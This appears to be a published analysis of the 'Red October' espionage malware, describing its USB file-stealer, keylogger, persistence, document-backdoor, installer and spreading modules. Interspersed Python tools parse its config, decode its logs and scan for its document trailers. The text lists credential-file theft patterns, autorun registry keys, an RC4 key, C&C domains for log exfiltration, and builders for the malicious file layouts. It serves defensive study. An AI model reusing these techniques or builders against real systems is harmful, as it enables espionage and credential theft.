a=/\.rtf$/
a=/\.pdf$/
a=/\.mdb$/ # MS Access database file
a=/\.doc\./ # *.doc.* files, could be for an archive of MS Word document file
a=/\.odt\./ # *.odt.* files, could be for an archive of OpenOffice document file
a=/\.docx\./ # etc
a=/\.rtf\./
a=/\.pdf\./
a=/\.xls\./
a=/\.wab$/ # Windows Address Book file (used in Outlook Express)
a=/accounts\.ini/ # could be Opera browser accounts and settings file
a=/account\.cfn/ # TheBat! e-mail client accounts and settings file
a=/signons\.txt/ # saved user names and passwords in Thunderbird, Sunbird, and earlier versions of Firefox
a=/ScribeOptions\.xml/ # probably settings of Scribe crossplatform e-mail client
a=/wand\.dat/ # Opera browser password manager database
a=/bpftp\.dat/ # BulletProof FTP client password database
a=/sm\.dat/ # CuteFTP password database
a=/smdata\.dat/ # CuteFTP password database
a=/FileZilla\.xml/ # FileZilla FTP client password and settings database
a=/ftplist\.txt/ # TotalCommander ftp upload file list (may contain credential information)
a=/addrbk\.dat/ # TurboFTP password and settings file
a=/wcx_ftp\.ini/ # Total Commander cached FTP credentials database
a=/ws_ftp\.ini/ # WS_FTP client password and settings file
a=/andrq\.ini/ # &RQ ICQ client password and settings file
a=/account\.xml/ # Very generic name, used in various software
a=/odigo\.com\.odu/ # Odigo instant messenger settings file
a=/TheBee\.ini/ # Some "The Bee" software ini file, unclear which software it is

# The following subgroup defines useless files that will not be taken.

d=/\\~wordspool.*\.tmp\.doc$/
d=/\\~wordspool.*\.srt\.doc$/
d=/\\~wordspool.*\.rtc\.doc$/

_s_fctime= /1990-01-01 01:02:03/ # files of group "s" after 1990-01-01 are interesting
_s_max_size=/20000000/ # max size for group "s" is 20MB as well
_s_min_size=/1/ # min size is 1 byte

# Some patterns of filenames below seem to be related to some other malware seen on usb drives. It may contain stolen credentials, so they copy it as well.

sa=/.*mssysmgr\.ocx/
sa=/.*\.cab\.bak/
sa=/.*list\.tlb/
sa=/.*drive\.tlb/
sa=/.+\\\$lddata\$\\.+/
sa=/.+\\NT.Config\\.+/
sa=/.*\\ldupver\.txt/
sa=/\w:\\[\d\w]+\.dll/
sa=/\w:\\[\d\w]+\.exe/
sa=/.*autorun\.inf/
sa=/.*thumb\.dd/
sa=/.*thumb\.db/
sa=/.*msnmsngr\.exe/
sa=/.*svchost\.exe/
sa=/.*EXPLORER\.EXE/
sa=/.+\.iau/
sa=/.+\.rst/
sa=/\.xps/ # This is a subgroup of various files with secrets, such as digital certificates, configs and password databases
sa=/\.cif$/
sa=/\.key$/
sa=/\.crt$/
sa=/\.cer$/
sa=/\.hse$/
sa=/\.pgp$/
sa=/\.gpg$/
sa=/\.conf$/
sa=/passw/
sa=/secret/
sa=/crypt/
sa=/krypt/
sa=/cypher/
sa=/cipher/
sa=/\.ovpn$/
sa=/\.xia$/
sa=/\.xiu$/
sa=/\.xis$/
sa=/\.xio$/
sa=/\.xig$/
sa=/pubring.*/
sa=/secring.*/
sa=/\.acidcsa$/
sa=/\.acidsca$/
sa=/\.aciddsk$/
sa=/\.acidpvr$/
sa=/\.acidppr$/
sa=/\.acidssa$/
sa=/\\ACIDInstallv.*\.exe$/
sa=/\\ACIDdirInstallv.*\.exe$/
sa=/\\Acid Technologies\\/ # Probably this and above refers to Acid Cryptofiler military grade encryption software
sa=/.*cisco.*\.txt$/
sa=/.*cisco.*\.cfg$/
_f_fctime= /1999-02-03 02:03:07/
_f_max_size=/10000000/
_f_min_size=/1/
fa=/~WRD32cache.*\.doc$/
fa=/glxcrt.*\.dat/
fa=/bcmntc.*\.tmp/
fa=/smrdprev.*\.tmp/
a=/\.ttr$/ # maybe TTR Backup software?
a=/\.tbe$/ # unclear
a=/\.tte$/ # unclear
a=/\._ok$/ # unclear
a=/\.ki$/ # unclear
a=/\.txt$/
a=/\.tvt$/
a=/\.txr$/ # CorelDraw file?
a=/\.tvr$/
a=/\.tbr$/
a=/\.kin$/

The config file may change while the module is running, and a special thread monitors config file changes and loads the new configuration when it is changed.
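A working parser for the decrypted config format above, added here as an example (it is not the module's own code and does not handle the encrypted on-disk file): it reads the key=/regex/ # comment lines, builds the per-group whitelists and blacklists, and applies the size and age parameters to file metadata. Assumptions: patterns are searched case-insensitively against the full path, a group without its own size or age parameters inherits the default group's, and the sample config is a constructed excerpt of the one quoted above.

```python
import re
from datetime import datetime, timedelta

# key=/value/ with an optional "# comment"; regex values contain no "/"
LINE_RE = re.compile(r'^\s*(\w+)\s*=\s*/(.*?)/\s*(?:#.*)?$')
# parameter names that may follow a group prefix (_s_max_size, _f_fctime)
PARAM_NAMES = {'st_size', 'id', 'fdeltatime', 'max_size', 'min_size', 'fctime'}

# Constructed excerpt of the decrypted config quoted in the report.
SAMPLE_CONFIG = r"""
magic=/lddata/ # magic string identifying config file start
_st_size=/300000000/
_fdeltatime= /2592000/ # default group: not older than 30 days
_max_size=/20000000/
_min_size=/1/
a=/\.doc$/
a=/wand\.dat/ # Opera browser password manager database
# The following subgroup defines useless files that will not be taken.
d=/\\~wordspool.*\.tmp\.doc$/
_s_fctime= /1990-01-01 01:02:03/ # group "s": anything written after 1990
_s_max_size=/20000000/
_s_min_size=/1/
sa=/\.ovpn$/
sa=/secring.*/
"""


def parse_config(text):
    """Return {group: {'allow': [re], 'deny': [re], 'params': {}}};
    group '' is the unprefixed default (a=, d=, _max_size=, ...)."""
    groups = {}

    def grp(name):
        return groups.setdefault(name, {'allow': [], 'deny': [], 'params': {}})

    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                        # blank or comment-only line
        key, val = m.group(1), m.group(2).strip()
        if key == 'magic':
            if val != 'lddata':
                raise ValueError('not an imapisync32.dat config')
        elif key.startswith('_'):           # group parameter
            body = key[1:]
            if body in PARAM_NAMES:
                gname, pname = '', body
            else:
                gname, pname = body.split('_', 1)
                if pname not in PARAM_NAMES:
                    raise ValueError('unknown parameter ' + key)
            grp(gname)['params'][pname] = val
        elif key[-1] in 'ad':               # regex list: <group>a / <group>d
            kind = 'allow' if key[-1] == 'a' else 'deny'
            grp(key[:-1])[kind].append(re.compile(val, re.IGNORECASE))
        else:
            raise ValueError('unexpected key ' + key)
    return groups


def _age_ok(params, default, mtime, now):
    """_fctime = oldest acceptable timestamp; _fdeltatime = max age in seconds."""
    if 'fctime' in params:
        return mtime >= datetime.strptime(params['fctime'], '%Y-%m-%d %H:%M:%S')
    delta = params.get('fdeltatime', default.get('fdeltatime'))
    return delta is None or now - mtime <= timedelta(seconds=int(delta))


def select_group(groups, path, size, mtime, now):
    """Name of the first group whose rules would steal `path`, else None."""
    default = groups.get('', {}).get('params', {})
    for name, g in groups.items():
        if not any(r.search(path) for r in g['allow']):
            continue                        # not whitelisted in this group
        if any(r.search(path) for r in g['deny']):
            continue                        # blacklisted in this group
        p = g['params']
        lo = int(p.get('min_size', default.get('min_size', 1)))
        hi = int(p.get('max_size', default.get('max_size', 2 ** 31)))
        if lo <= size <= hi and _age_ok(p, default, mtime, now):
            return name
    return None


def demo():
    """Apply the sample config to constructed file records."""
    groups = parse_config(SAMPLE_CONFIG)
    now = datetime(2012, 11, 12, 18, 7, 26)
    fresh, old = now - timedelta(days=5), now - timedelta(days=60)
    records = [                             # (path, size, mtime), constructed
        (r'E:\report.doc', 4096, fresh),
        (r'E:\archive\old_report.doc', 4096, old),
        (r'E:\~wordspool1.tmp.doc', 4096, fresh),
        (r'E:\vpn\office.ovpn', 900, old),
        (r'E:\big.doc', 30000000, fresh),
        (r'E:\notes.txt', 10, fresh),
    ]
    return {p: select_group(groups, p, s, t, now) for p, s, t in records}
```

Note that the "s" group has only an absolute _s_fctime floor, so a two-month-old .ovpn is still selected while a two-month-old .doc in the default group is skipped by _fdeltatime.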

The module lists all available attached removable drives and iterates through all of them except A: and B: (reserved for floppy disks). It collects full file paths and file meta-information, then compresses, encrypts and stores this in the %TMP%\mrtdsync\win64esrt_* database. Additionally, files from the list of interest are copied to win64berts* files, which also hold the full information and body of the file. It is encrypted and compressed twice.

There is a separate thread to monitor filesystem changes. Every time a new file or directory is created or changed on the monitored drives, the updated information goes to %TMP%\mrtdsync\win64esrt_* in a separately spawned thread; additionally, all changed or created files are copied to a new win64berts* file.

This module works offline and doesn't communicate with any other host on the network.

6. Keyboard group

Keylogger module

Known variants:

MD5 Compilation date (encrypted) Compilation date (payload)

33bda0e77b840809e66e12d020e054c5 2011.04.14 12:00:26 (GMT) 2010.10.05 10:53:49 (GMT)

3cb7318ed40239f7219d86343a17b54b 2011.05.10 07:45:02 (GMT) 2010.10.05 10:53:49 (GMT)

dfcce19f2852db652071088bf9461b4a 2011.05.10 07:44:55 (GMT) 2010.10.05 10:53:49 (GMT)

6079a0746e76c1090dc110e08de645e2 2011.05.20 11:00:18 (GMT) 2010.10.05 10:53:49 (GMT)

57897c997c699135b9460c0be7a4b27e 2011.10.10 07:59:41 (GMT) 2010.10.05 10:53:49 (GMT)

ecc7a5ef3f5e92f0c7da0bef8d392b5f 2011.05.12 10:47:39 (GMT) 2010.10.05 10:53:49 (GMT)

The file is a PE EXE file, compiled with Microsoft Visual Studio 2005. Its main purpose is to log keystrokes, copy input texts and make screenshots.

Main function

Opens and creates the event WIN_%08X%08X%08X%08X%08X (SHA1(first 512 bytes of self file)); if it exists, terminates. Sets itself in AutoRun, using the following registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“Mspmr32” = %Path to the module%

Deletes the file “Keylogger.log” (this filename is not used anywhere else). Registers a window class with the RegisterClassEx API using ClassName “svchost.exe”, and assigns a window procedure that implements the main module functionality. Creates a window with the CreateWindowEx API using ClassName “svchost.exe” and window name “svchost”, and associates it with the registered class.

Registers a device with the RegisterRawInputDevices API and associates it with the created window with the flag RIDEV_INPUTSINK, which enables the caller to receive the input even when the caller is not in the foreground.

Window procedure

All the logging actions are implemented based on receiving the WM_INPUT window message, when the raw input returned by the GetRawInputData API comes from the keyboard and carries a WM_KEYDOWN message.

Collected information

It collects some general information about the current user and opened windows/processes:

Foreground window text or WT_UNKNOWN
Module FileName or MN_UNKNOWN
Foreground window class name
UserName

It is capable of making full desktop screenshots and copying clipboard data of password input fields (to check a window, EM_GETPASSWORDCHAR is sent to it).

If “Shift+Insert”, “Ctrl+C”, “Ctrl+V”, “Ctrl+X” or “Ctrl+Insert” is pressed, then it copies the clipboard data.

Creates the file %TMP%\SSDPserv32\ssdtrbs%08x%.sys.%d% (%08x – random hex value, %d – time64()). All the collected information is compressed with Zlib and RC4-encrypted with the key “qefwljkfnw3l;fjwe;fklwejfw;eflkwe;flwe”, and written to this file.
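A decoder for the keylogger's output files and a helper for its single-instance event name, added here as an example for incident responders (it is not the malware's code). Assumptions: RC4 is applied as one keystream over the whole file with the ASCII key quoted above, the Zlib stream carries a standard header, the five %08X fields are the SHA-1 digest read as little-endian DWORDs, and the output name is ssdtrbs followed by 8 hex digits, .sys. and a decimal time64() value.

```python
import hashlib
import re
import struct
import zlib

RC4_KEY = b'qefwljkfnw3l;fjwe;fklwejfw;eflkwe;flwe'   # key quoted in the report
# %TMP%\SSDPserv32\ssdtrbs%08x.sys.%d : 8 hex digits, then a time64() value
LOG_NAME_RE = re.compile(r'^ssdtrbs[0-9a-f]{8}\.sys\.\d+$', re.IGNORECASE)


def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_log(blob, key=RC4_KEY):
    """Undo the report's order of operations: RC4-decrypt, then inflate."""
    plain = rc4(key, blob)
    if plain[:1] != b'\x78':        # zlib CMF byte for deflate, 32K window
        raise ValueError('no zlib header after RC4: wrong key or not a log')
    try:
        return zlib.decompress(plain)
    except zlib.error as exc:
        raise ValueError('zlib stream is corrupt: %s' % exc) from exc


def encode_log(text, key=RC4_KEY):
    """Produce a file in the same layout; used here only to build test data."""
    return rc4(key, zlib.compress(text))


def event_name(sample):
    """'WIN_' + five %08X fields over SHA-1 of the sample's first 512 bytes
    (digest read as little-endian DWORDs; an assumption, see lead-in)."""
    words = struct.unpack('<5I', hashlib.sha1(sample[:512]).digest())
    return 'WIN_' + ''.join('%08X' % w for w in words)


def is_keylog_name(name):
    """True if a filename matches the module's output naming scheme."""
    return LOG_NAME_RE.match(name) is not None
```

Because RC4 is symmetric, a wrong key produces random bytes rather than an error, so the zlib header check is what tells a responder the key did not match.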


“Red October”. Detailed Malware Description 4. Second Stage of Attack - Securelist
Source: http://www.securelist.com/en/analysis/204792273/Red_October_Detailed_Malware_Description_4_Second_Stage_of_Attack


7. Persistence group

Scheduler module

Known locations: %APPDATA%\Microsoft\RtkN32Gdi.exe

The module is created and executed (for the first time) by the module "fileputexec".

Known variants:

MD5 Compilation date (encrypted) Compilation date (payload)

43C0BA45BE45CA20ED014A8298104716 2012.10.24 13:12:43 (GMT) 2012.10.11 07:19:12 (GMT)

Summary

The file is a PE EXE file, compiled with Microsoft Visual Studio 2010.

Creates encrypted log files: "%TMP%\smrdprev\smrdprev_%p_%p.tmp", where the "%p" parameters are formatted from the return values of subsequent GetTickCount API calls.

Creates event: "Global\wsheledstpknt"

Creates mutex: "NtWinWMIctlshed"

When started, the module initializes its log object with a new filename. Then, it creates one of the following registry values to ensure its automatic start:


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\servise=%path to the module's executable file%

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load=%path to the module's executable file%

Then, the module enters an infinite loop where it executes its main function with a 300-second delay between iterations.

Main function

The module traverses the directories from a hardcoded list, looking for files with names matching the regular expressions ".*\..*\.bak" and ".*\..*\.trh". The list of directories:

%ProgramFiles%\Microsoft Common\
%ProgramFiles%\Common Files\
%SystemDrive%\Documents and Settings\LocalService\Application Data\Microsoft\
%SystemDrive%\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\
%ALLUSERSPROFILE%\
%ALLUSERSPROFILE%\Application Data\
%ALLUSERSPROFILE%\Application Data\Microsoft\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\
%ALLUSERSPROFILE%\Application Data\Microsoft\Windows\
%windir%\Installer\
%windir%\Help\Tours\mmTour\
%windir%\Help\Tours\htmTour\
%windir%\Help\Tours\WindowsMediaPlayer\
%windir%\IME\
%windir%\MsApps\
%windir%\MsApps\MsInfo\
%windir%\inf\
%HOMEPATH%\Local Settings\
%APPDATA%\
%APPDATA%\Microsoft\Office\
%APPDATA%\Microsoft\Office\Data\
%APPDATA%\Microsoft\Windows\
%windir%\Temp\
%TMP%\
%module's installation directory%

Any found file with the extension ".trh" is deleted.

Files with the extension ".bak" are treated differently. They are decrypted using a custom AMPRNG algorithm with a hardcoded key, then decompressed using LZMA. If the file was decompressed without errors, it is expected to start with a header that describes an internal task.

Each task has a name and a "type" field. Depending on that field, the module treats the contents of the decrypted file differently:

Task type   Task action

1   The task is a PE EXE file. It is written to a temporary file '%TMP%\%number%.exe' and executed with the CreateProcess API. The file is removed when the process terminates.

3   The task is a PE DLL file. It is loaded in memory with a custom PE loader. Then, its export named 'START' is called.

4   The task is a new version of the 'scheduler' module. The original module is moved to a file with extension '.trh' and deleted; the task's contents are written instead.

Known variants of the ".bak" task files were created by the "fileputexec" module. They all contained a task named "fileinfo".

DocBackdoor (Acrobat Reader and Microsoft Office plugin) module

Known file locations: add-on directories of Acrobat Reader or Microsoft Office, depending on installation settings.

Known variants:

MD5 Compilation date (payload)

1294af519b9e6a521294607c8c1b3d27 2012.05.14 08:49:35 (GMT)

Summary

The file is a PE DLL file with 1 exported function, compiled with Microsoft Visual Studio 2010. The malware contains a universal plugin for the Acrobat Reader and Microsoft Office applications. The plugin does not depend on the application, so it could have been used with other applications, too.

Export(s): winampGetGeneralPurposePlugin

All the functionality is implemented in the DllMain function.

DllMain function

When loaded, the module starts a new thread and returns. In the new thread, the module executes its main function in an infinite loop, with a 1 second delay.

Main function

The module iterates through file handle values from 0 to 65534 with step 4, and tries to get the file size for every handle. If the call to GetFileSize succeeds, the module assumes that it found a valid file handle, and proceeds with this file. The file handle may belong to any file that is currently open by the application, including any open documents (i.e. PDF, DOC, XLS, PPT files).

The module retrieves the name of the file, reads the whole file into memory and checks its last DWORD. If the value is not equal to the magic number 0x29A (666 decimal), it skips this file. If the DWORD matches the magic value, it reads more values from the end of the file.

Offset from the end of file   Type   Description

-4   DWORD   Magic number 0x29A

-5   BYTE   Operation mode byte

-9   DWORD   Payload length

-9 - payload length   BYTE[payload length]   Encrypted payload

If the operation mode byte is equal to 3, the module loads the decrypted payload as a PE DLL library using its own PE format loader, and executes its DllMain function. If the operation mode byte contains any other value, it tries to write the payload to the first available directory from the list:

%windir%\Temp\
%TMP%\
%TEMP%\
%ProgramFiles%\Common Files\
%ProgramFiles%\WindowsUpdate\

The name of the file is read from the beginning of the decrypted payload.


Then, the module selects further actions depending on the operation mode byte:

Operation mode byte value Action

1 Execute the file with CreateProcess

2 Load the file with LoadLibrary
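A scanner for the trailer layout described above, added here as an example (not the plugin's code) so a defender can check whether a document carries the appended structure and which mode it would trigger. Assumptions: DWORDs are little-endian as on Windows; the payload encryption is not described in the report, so the payload is returned exactly as stored.

```python
import struct
from typing import NamedTuple, Optional

MAGIC = 0x29A            # 666 decimal, last DWORD of a carrier document
MODE_ACTIONS = {         # from the operation mode table in the report
    1: 'write payload to disk and run it with CreateProcess',
    2: 'write payload to disk and load it with LoadLibrary',
    3: 'load payload in memory with the custom PE loader',
}


class Trailer(NamedTuple):
    mode: int            # operation mode byte
    payload: bytes       # payload exactly as stored (still encrypted)
    document_len: int    # bytes of legitimate document before the payload


def parse_trailer(data: bytes) -> Optional[Trailer]:
    """Return the trailer fields if `data` ends with the 0x29A structure,
    else None.  From the end: [-9] DWORD length, [-5] BYTE mode,
    [-4] DWORD magic; the payload sits immediately before the length."""
    if len(data) < 9:
        return None
    magic, = struct.unpack_from('<I', data, len(data) - 4)
    if magic != MAGIC:
        return None                  # an ordinary document
    mode = data[-5]
    length, = struct.unpack_from('<I', data, len(data) - 9)
    start = len(data) - 9 - length
    if length == 0 or start < 0:
        return None                  # length field cannot be honoured
    return Trailer(mode, data[start:len(data) - 9], start)


def describe(trailer: Trailer) -> str:
    """One-line summary for an incident note."""
    action = MODE_ACTIONS.get(trailer.mode, 'unknown mode %d' % trailer.mode)
    return '%d-byte payload after %d document bytes; action: %s' % (
        len(trailer.payload), trailer.document_len, action)


def build_carrier(document: bytes, payload: bytes, mode: int) -> bytes:
    """Assemble the same layout; used here only to construct test data."""
    return (document + payload + struct.pack('<I', len(payload))
            + bytes([mode]) + struct.pack('<I', MAGIC))


def scan_file(path: str) -> Optional[Trailer]:
    """Convenience wrapper for a document on disk."""
    with open(path, 'rb') as fh:
        return parse_trailer(fh.read())
```

A trailing 0x29A can occur by chance in binary formats, so a hit should be confirmed by checking that the bytes before the payload end like the host format normally does (for PDF, with an %%EOF marker).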

OfficeBDInstaller module (Microsoft Office plugin installer)

Known variants:

MD5 Compilation date (payload)

AE693C43E40F0DE9DE9FA2D950003ABF 2012.10.09 06:42:11 (GMT)

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

DllMain

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_msplugin" and is registered in the framework. Then, it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_MODE, "3")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] %removed%)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] %removed%)
SetOption(msplugin_loc, 76288 bytes buffer)
SetOption(msplugin_name, 28 bytes buffer)
SetOption(msplugin_Word, "1")
SetOption(msplugin_Excel, "0")
SetOption(msplugin_PowerPoint, "0")
SetOption(msplugin_desc0, 38 bytes buffer)
SetOption(msplugin_desc1, 58 bytes buffer)
SetOption(msplugin_desc2, 64 bytes buffer)
SetOption(msplugin_progid, 22 bytes buffer)
Call(task_msplugin)


Main function (task_msplugin)

First, the module tries to raise its privileges. It tries to log in as a privileged user using a dictionary of common passwords. Then, it tries to locate the installed Microsoft Office application by enumerating the registry keys in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and searching for the keys that contain "Microsoft Office", "Microsoft Office Word", "Microsoft Office Shared" in the "DisplayName" value. If no key was found, the module aborts installation.

Then, depending on the values of the options "msplugin_Word", "msplugin_Excel", "msplugin_PowerPoint", it installs a plugin for the selected Office applications. For each application, it tries to write the plugin to the first available directory from the list:

%ProgramFiles%\Microsoft Office\Office10\Data\
%ProgramFiles%\Microsoft Office\Office10\
%ProgramFiles%\Microsoft Office\Office11\Data\
%ProgramFiles%\Microsoft Office\Office11\
%ProgramFiles%\Microsoft Office\Office12\Data\
%ProgramFiles%\Microsoft Office\Office12\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\
%APPDATA%\Microsoft\Office\Data\
%APPDATA%\Microsoft\Office\
%APPDATA%\Microsoft\Windows\
%ProgramFiles%\Microsoft Common\
%ProgramFiles%\Common Files\

The file name for the plugin is retrieved from the "msplugin_name" option of the resource. It also generates a random CLSID value for the plugin.

If the file was created without errors, the module creates the following registry values:

HKLM\SOFTWARE\Microsoft\Office\%product name%\Addins\%msplugin_progid option value%\
LoadBehavior=DWORD:0x10
CommandLineSafe=DWORD:0x00
FriendlyName=%msplugin_desc1 option value%
Description=%msplugin_desc2 option value%

HKCR\CLSID\%plugin's CLSID%\default=%msplugin_desc0 option value%

HKCR\CLSID\%plugin's CLSID%\InProcServer32\default=%plugin installation path%

HKCR\CLSID\%plugin's CLSID%\ProgID\default=%msplugin_progid option value%

HKCR\CLSID\%plugin's CLSID%\VersionIndependentProgID\default=%msplugin_progid option value%

HKCR\%msplugin_progid option value%\CLSID\default=%plugin's CLSID%

After completing the installation, the module sends its log file to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description


D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

AdobeBDInstaller module (Adobe Reader plugin installer)

Known variants:

MD5 Compilation date (payload)

09fd8e1f2936a97df477a5e8552fe360 2012.10.05 11:20:40 (GMT)

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

DllMain function

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_arplugin" and is registered in the framework. Then, it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] %removed% )
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] %removed% )
SetOption(arplugin_loc, 76288 bytes buffer )
SetOption(arplugin_name, 28 bytes buffer )
Call(task_arplugin)

Main function (task_arplugin)

The module retrieves the Adobe Reader installation path by reading the registry value:

HKLM\SOFTWARE\Classes\Software\Adobe\Acrobat\Exe\@default

Then, it tries to identify the version of the installed software by searching for the strings "10.0\", "9.0\", "8.0\" in the installation path. If none of them is found, it aborts installation with an error.


If installation path contains the string "10.0\", the module tries to open the existing registry key:

HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0

If the key exists, it then writes "Privileged='ON'" into its log and sets the following registry value, effectively disabling the "protected mode" of Adobe Reader:

HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\Privileged\bProtectedMode=0

Then, the module extracts the Acrobat Reader plugin body from the configuration option "arplugin_loc" (specified in the resource) and writes it to:

%acrobat reader installation path%\plug_ins\%arplugin_rem option value%

It also retrieves the last write time of the plug_ins directory and sets the plugin's last write time to the same value.

After completing the installation, the module sends its log file to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description

D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

8. Spreading group

Fileputexec module

Known variants:

MD5 Compilation date (payload)

6FE7EB4E59448E197BDFAE87247F3AE6 2012.09.06 07:55:31 (GMT)

ED5FF814B10ED25946623A7EC2C0A682 2012.09.06 07:55:31 (GMT)

37B443893551C1537D00FD247E3C9A78 2012.09.06 07:55:31 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share one code section, but contain different payloads in the resource section. All the functionality is implemented in the DllMain function. It writes files from its configuration resource to disk and starts a new process from these file(s).

DllMain

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_fileputexec" and is registered in the framework. Then, it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

Decoded resource data for the module can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] %removed%)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] %removed%)
SetOption(file_loc)
SetOption(file_rem)
SetOption(file_exec_rem)
SetOption(file_loc, 156898 bytes buffer )
SetOption(file_rem, 100 bytes buffer )
Call(task_fileputexec)

Main function (task_fileputexec)

The module implements two distinct functions:

1. It writes files from its configuration resource to disk
2. It starts executable files specified in the resource

First, the module looks for pairs of configuration options called "file_rem" and "file_loc". The module iterates through all "file_rem" options, reads the corresponding "file_loc" value and writes the contents of the latter option to disk, using the value of "file_rem" as the filename.

The "file_rem" value can specify a location on another computer's network share. In this case the module tries to log on to that share using credentials specified in an encrypted configuration file that may be located at:

%ALLUSERSPROFILE%\adt.dat
%LOCALAPPDATA%\adt.dat

Known variants of the module were used to write another module called "scheduler" and additional files for this module.

After processing all "file_rem" and "file_loc" options, the module iterates through all values of the "file_exec_rem" option. Each value is expected to be an application path, and each application is executed using the CreateProcess API function.

After processing all the configuration options, the module sends its log file to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description

D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

Netscan module


Known variants:

MD5 Compilation date

06ebdde6a600a65e9e65ba7c63f139fa 2012.09.05 07:02:28 (GMT)

b49232652748ab677a944bd4d4650603 2012.09.05 07:02:28 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

Once loaded, it is designed to start scanning other hosts in the network and record responses. It performs several probes for remote vulnerabilities, such as MS08-067. It is capable of dumping the current configuration of Cisco routers if they are available via SNMP and the scanner successfully guessed the SNMP community name.

This module loads a config from local resource AAA and executes a network scanning task.

Loading procedure

